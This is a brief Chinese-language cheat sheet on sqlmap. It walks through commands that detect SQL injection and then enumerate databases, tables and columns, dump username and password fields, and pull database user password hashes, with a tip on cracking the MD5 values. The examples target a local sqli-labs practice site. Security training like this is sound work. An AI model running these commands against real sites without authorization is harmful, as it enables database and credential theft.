sqlmap是一个自动化的sql注入工具,其主要功能就是扫描、发现给定url的sql注入漏洞。
1. 判断是否存在注入
当url中存在两个参数时,要使用双引号
sqlmap -u +url
2. 判断文本中的请求是否存在注入
利用工具burp suite抓包,保存为文本
sqlmap -r +http请求文本
3. 查询当前用户下的所有数据库
sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs
4. 获取数据库中的表名
sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security --tables
5. 获取表中的字段名
sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users --columns
6. 获取字段内容
sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C username,password --dump
7. 获取数据库中的所有用户
sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --users
8. 获取数据库用户的密码
sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --passwords
查询到的密码时MD5值,在MD5解密网站即可得到明文密码
9. 获取当前网站数据库的名称
sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-db
10. 获取当前数据库的用户名称
sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-user